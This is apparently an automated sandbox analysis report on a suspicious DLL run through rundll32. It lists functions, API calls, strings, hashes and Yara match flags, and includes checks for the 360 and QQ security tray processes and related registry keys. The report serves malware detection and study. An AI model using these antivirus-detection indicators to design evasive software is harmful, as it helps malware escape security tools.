Part of subcall function 000000018006442C: memset.MSVCRT ref: 0000000180064485
Part of subcall function 000000018006442C: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000000018006448F
Part of subcall function 000000018006442C: GetLastError.KERNEL32 ref: 000000018006449C
Part of subcall function 000000018006442C: EnterCriticalSection.KERNEL32 ref: 00000001800644C5
Part of subcall function 000000018006442C: memset.MSVCRT ref: 00000001800644DB
Part of subcall function 000000018006442C: GetModuleFileNameW.KERNEL32 ref: 00000001800644F4
Part of subcall function 000000018006442C: PathAppendW.SHLWAPI ref: 0000000180064508
Part of subcall function 000000018006442C: PathAppendW.SHLWAPI ref: 000000018006451C
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 0000000180064549
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 000000018006455E
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 0000000180064573
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 0000000180064588
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 000000018006459D
Part of subcall function 000000018006442C: memset.MSVCRT ref: 00000001800645E5

LeaveCriticalSection.KERNEL32 ref: 0000000180064EA8

Strings

speedmem2.hg, xrefs: 0000000180064E69
..\deepscan\, xrefs: 0000000180064E57

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$AppendCriticalPathSection$memset$EnterFileModuleName$??2@CountErrorInitializeLastLeaveSpin
String ID: ..\deepscan\$speedmem2.hg
API String ID: 2338990259-1390971677
Opcode ID: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
Instruction ID: 91bce694e0342d9d21a92653d8ecf9702c458f92e478111cc4d5f0d53c5c3f7e
Opcode Fuzzy Hash: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
Instruction Fuzzy Hash: BB212C35215B4D81EA928B64FC953996360FB5C7E4F409215E96D077B4EF78C64EC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004242C Relevance: 13.7, APIs: 9, Instructions: 156networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180066050: EnterCriticalSection.KERNEL32 ref: 0000000180066098
Part of subcall function 0000000180066050: LeaveCriticalSection.KERNEL32 ref: 00000001800660E1

Part of subcall function 0000000180043154: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043187
Part of subcall function 0000000180043154: htonl.WS2_32 ref: 00000001800431F3

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042510
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004253B
htons.WS2_32 ref: 0000000180042586
htonl.WS2_32 ref: 0000000180042596
htons.WS2_32 ref: 00000001800425A4
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00000001800425C3
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800425E6
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042612
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042632

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSectionhtonlhtons$EnterLeavememmove
String ID:
API String ID: 33644419-0
Opcode ID: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
Instruction ID: 90b71582b8c4a32b78347334d3d295f004072f45cff62f784db803bd1658b447
Opcode Fuzzy Hash: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
Instruction Fuzzy Hash: 69614736B00B549AF792DFA1E9503ED33B5B70878CF458019EE5627A98DF34866EC348

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014F24 Relevance: 13.6, APIs: 9, Instructions: 146COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32 ref: 0000000180014FEE
VariantInit.OLEAUT32 ref: 0000000180015009
SafeArrayPutElement.OLEAUT32 ref: 000000018001503B
VariantInit.OLEAUT32 ref: 0000000180015069
VariantInit.OLEAUT32 ref: 0000000180015094

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: InitVariant$ArraySafe$CreateElement
String ID:
API String ID: 3308809976-0
Opcode ID: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
Instruction ID: 146264a788ca7c4eb20d782c9947d04824275c30ee96bc1b713ea33f9e3da92e
Opcode Fuzzy Hash: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
Instruction Fuzzy Hash: 52515A32B00A548AE781CFA5EC843DD37B0F7487A9F158125EA5A97764EF34C64AC340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E59C Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 311COMMON

Download Yara Rule

APIs

??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001E625
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001E6A1
_wcsicmp.MSVCRT ref: 000000018001E926

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 000000018001E8CC
.exe, xrefs: 000000018001E5A5, 000000018001E919
InitString, xrefs: 000000018001E741
%I64u, xrefs: 000000018001E7A3

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _wcsicmp
String ID: %I64u$.exe$InitString$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
API String ID: 2081463915-3789319691
Opcode ID: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
Instruction ID: 99d661dcfab4fd9f60583e58d61e1d075c9151c162a47e32eebc6396990c7acc
Opcode Fuzzy Hash: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
Instruction Fuzzy Hash: A8C1B172710A488AEB929B25D8407DD33A0F749BE8F448216FE6D47BE5DF38C689C744

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180036EC8 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 238COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0000000180036F7A
_wcslwr.MSVCRT ref: 0000000180036FC8
wcschr.MSVCRT ref: 0000000180037043
wcscmp.MSVCRT ref: 00000001800370A6
wcscmp.MSVCRT ref: 00000001800370BA

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018001B6F0: wcsstr.MSVCRT ref: 000000018001B73B
Part of subcall function 000000018001B6F0: wcsstr.MSVCRT ref: 000000018001B764
Part of subcall function 000000018001B6F0: IIDFromString.OLE32 ref: 000000018001B7CF

Strings

clsid, xrefs: 000000018003709B
clsid2, xrefs: 00000001800370AF

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: wcschrwcscmpwcsstr$FromHeapProcessString_wcslwr
String ID: clsid$clsid2
API String ID: 2934854147-3646038404
Opcode ID: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
Instruction ID: bd95a24bb0aafbb45aea4f5794df0f126b37bc211fbb868afd4ed2029302fca7
Opcode Fuzzy Hash: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
Instruction Fuzzy Hash: 86A16172701A4885EBA79B29C8503EE63A1FB49BD4F46C122FA1D477D6EF74CA49C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180068390 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180067B20: memset.MSVCRT ref: 0000000180067B76

memset.MSVCRT ref: 0000000180068455
memmove.MSVCRT ref: 000000018006849B
??3@YAXPEAX@Z.MSVCRT ref: 00000001800684CF
memmove.MSVCRT ref: 0000000180068525
??3@YAXPEAX@Z.MSVCRT ref: 0000000180068555

Strings

unknown error, xrefs: 00000001800683F1
generic, xrefs: 0000000180068580

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@memmovememset
String ID: generic$unknown error
API String ID: 2528313377-3628847473
Opcode ID: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
Instruction ID: f953be595861da4e4b866d1587ee45b735e1f1b3269ec21885f27e4079069760
Opcode Fuzzy Hash: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
Instruction Fuzzy Hash: 4451A372704B8882EF459B16DA443AD6362F749BD0F50C221FB6A07BD6EF78C6A59340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800744F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000000018007460C
FreeLibrary.KERNEL32 ref: 000000018007466D
GetModuleHandleW.KERNEL32 ref: 000000018007468D
GetProcAddress.KERNEL32 ref: 00000001800746A2

Strings

kernel32, xrefs: 0000000180074686
AddDllDirectory, xrefs: 0000000180074698

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: AddDllDirectory$kernel32
API String ID: 1437655972-3758863895
Opcode ID: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
Instruction ID: bbf3e12eda5f2f818c86a6d8723dcf8fbef42ab492d342ab48d7d832c77590ad
Opcode Fuzzy Hash: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
Instruction Fuzzy Hash: 7751E53231164885FEA6CF51E4103E962A0FB5DBE4F48C621EA6A4B7D4DF3DC649C705

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040688 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180040746
LeaveCriticalSection.KERNEL32 ref: 000000018004078F

Part of subcall function 00000001800432C8: memset.MSVCRT ref: 0000000180043335

std::exception_ptr::exception_ptr.LIBCONCRT ref: 0000000180040802
std::_XGetLastError.LIBCPMT ref: 0000000180040811

Strings

x86, xrefs: 00000001800407B0
arm64, xrefs: 0000000180040713
x64, xrefs: 000000018004079E

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeavememsetstd::_std::exception_ptr::exception_ptr
String ID: arm64$x64$x86
API String ID: 4069188616-280937049
Opcode ID: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
Instruction ID: 117583cd4254ef97ff9b72dc100ece26d9127ce95370434fd6434e2e215e4972
Opcode Fuzzy Hash: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
Instruction Fuzzy Hash: 78415B71B00A1C95FA92DB20EC843D937A4F70C7E8FA58611F96A536E6DF34C68AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040E18 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180040ECE
GetProcAddress.KERNEL32 ref: 0000000180040EDE
GetCurrentProcess.KERNEL32 ref: 0000000180040EF6
std::exception_ptr::exception_ptr.LIBCONCRT ref: 0000000180040F64
std::_XGetLastError.LIBCPMT ref: 0000000180040F72

Strings

IsWow64Process2, xrefs: 0000000180040ED7
Kernel32.dll, xrefs: 0000000180040EC7

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCurrentErrorHandleLastModuleProcProcessstd::_std::exception_ptr::exception_ptr
String ID: IsWow64Process2$Kernel32.dll
API String ID: 1364622999-2175735969
Opcode ID: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
Instruction ID: 5a1c62e2a9ead4f3428123871bab1930646db393e55966b9c052552951b7636c
Opcode Fuzzy Hash: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
Instruction Fuzzy Hash: DD416531204B4991EAA2CF14EC843DA73A4FB8D794FA18226F659437A5DF38CB4DCB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C6D8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE

EnterCriticalSection.KERNEL32 ref: 000000018003C719
LeaveCriticalSection.KERNEL32 ref: 000000018003C72D
LeaveCriticalSection.KERNEL32 ref: 000000018003C750
GetProcAddress.KERNEL32 ref: 000000018003C77C
FreeLibrary.KERNEL32 ref: 000000018003C7AE
LeaveCriticalSection.KERNEL32 ref: 000000018003C7BF

Strings

InitLibs, xrefs: 000000018003C772

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$AddressEnterFreeInitializeLibraryProc
String ID: InitLibs
API String ID: 388043826-2748520195
Opcode ID: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
Instruction ID: 14a8bfa7cef1bdae3a626f07b321ff872beb2833b4a3adf2d3b4914cd80619d3
Opcode Fuzzy Hash: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
Instruction Fuzzy Hash: 5631953661874882EBA78F25A4547AE23B0F78DFD4F1A9125ED5A473A4DF38C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B004 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018001B03F
GetModuleFileNameW.KERNEL32 ref: 000000018001B051
PathFindFileNameW.SHLWAPI ref: 000000018001B05C
_wcsicmp.MSVCRT ref: 000000018001B074
_wcsicmp.MSVCRT ref: 000000018001B094

Strings

360tray.exe, xrefs: 000000018001B06A
QHSafeTray.exe, xrefs: 000000018001B08A

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: FileName_wcsicmp$FindModulePathmemset
String ID: 360tray.exe$QHSafeTray.exe
API String ID: 2436975468-72543816
Opcode ID: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
Instruction ID: f13d88eabac643da90db78e2c45270d8f51b6174de2d3bfd56aa28c15744bb18
Opcode Fuzzy Hash: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
Instruction Fuzzy Hash: 86114230615B4882FBA6CB21EC593D62364FB8C7A5F408225E56A867E5EF3DC74DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC854110 Relevance: 12.2, APIs: 8, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00000187EC85AD34: NtAllocateVirtualMemory.NTDLL ref: 00000187EC85AD6A

Part of subcall function 00000187EC857E90: SHGetFolderPathW.SHELL32 ref: 00000187EC857EC3

wsprintfW.USER32 ref: 00000187EC85424D
wsprintfW.USER32 ref: 00000187EC8542A8
wsprintfW.USER32 ref: 00000187EC8543C3

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateFolderMemoryPathVirtual
String ID:
API String ID: 206084008-0
Opcode ID: 3f0a1096dd83600a13c208f95dfa09032702bdcf8618f0e5637695aff639911f
Instruction ID: 7932a705646771bc3db6a2849e4b2e7792989f7e66eb4c824e066b8290d8d11f
Opcode Fuzzy Hash: 3f0a1096dd83600a13c208f95dfa09032702bdcf8618f0e5637695aff639911f
Instruction Fuzzy Hash: F4D1C93A22DBC191EA60DB10E5907DBB761F7C4344F609466AB8D83AD9DFBCC649CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005A8D8 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

_time64.MSVCRT ref: 000000018005A906
EnterCriticalSection.KERNEL32 ref: 000000018005A951
_time64.MSVCRT ref: 000000018005A95D
LeaveCriticalSection.KERNEL32 ref: 000000018005AAC1

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection_time64$EnterLeave
String ID:
API String ID: 3499907473-0
Opcode ID: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
Instruction ID: 2d3d355faa5a201e66dfe59503a55f94d93e9d2144db4385c4ebef4b0973e561
Opcode Fuzzy Hash: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
Instruction Fuzzy Hash: B9517B31605B4889FB968F25E9543D933A5FB0EBE8F548115FD5A27764CF39C689C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074200 Relevance: 12.1, APIs: 8, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180074221

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
Instruction ID: 8158435372b26aa4a6dd2edb7174a458af360551698bfd787e5366ef90707461
Opcode Fuzzy Hash: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
Instruction Fuzzy Hash: 0441A733604A4886EAA36FA9A4003DD7290BB8C7F4F55C310FA684B7D6CF3DC6598711

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC855750 Relevance: 11.0, APIs: 7, Instructions: 467threadCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00000187EC855BB7
wsprintfA.USER32 ref: 00000187EC855CA6
wsprintfA.USER32 ref: 00000187EC855DCD
new[].LIBCPMTD ref: 00000187EC855E75

Part of subcall function 00000187EC854D20: InternetCloseHandle.WININET ref: 00000187EC854F33
Part of subcall function 00000187EC854D20: InternetCloseHandle.WININET ref: 00000187EC854F46

new[].LIBCPMTD ref: 00000187EC855FA3
GetExitCodeThread.KERNEL32 ref: 00000187EC8561C3
GetExitCodeThread.KERNEL32 ref: 00000187EC8561FC

Part of subcall function 00000187EC85AD34: NtAllocateVirtualMemory.NTDLL ref: 00000187EC85AD6A

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$CloseCodeExitHandleInternetThreadnew[]$AllocateMemoryVirtual
String ID:
API String ID: 511820185-0
Opcode ID: 3fe910b28b83b94efe5e873a318251407e96b92a7ff7815bdbceea1527c33b44
Instruction ID: b5c6d67318c2905c6099b65e0f5f6d448cb4de35ede9d64d4c3c299b03bcc989
Opcode Fuzzy Hash: 3fe910b28b83b94efe5e873a318251407e96b92a7ff7815bdbceea1527c33b44
Instruction Fuzzy Hash: 1052B57A52DA80C6E7B08B15E6843DAB7A1F7C4344F208156D68986BE9DFBCC684CB05

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056664 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 463registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 00000001800562D0: memset.MSVCRT ref: 000000018005630E
Part of subcall function 00000001800562D0: GetModuleFileNameW.KERNEL32 ref: 0000000180056325
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 0000000180056349
Part of subcall function 00000001800562D0: _wcsicmp.MSVCRT ref: 0000000180056364
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 000000018005637A

RegCloseKey.ADVAPI32 ref: 0000000180056B49

Strings

SOFTWARE\, xrefs: 0000000180056852, 0000000180056A1B, 0000000180056BC8
360EntSecurity, xrefs: 00000001800566AF
SOFTWARE\Wow6432Node\, xrefs: 000000018005678F, 000000018005695A, 0000000180056B7E
?, xrefs: 0000000180056B12
360Safe, xrefs: 00000001800566C5

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin
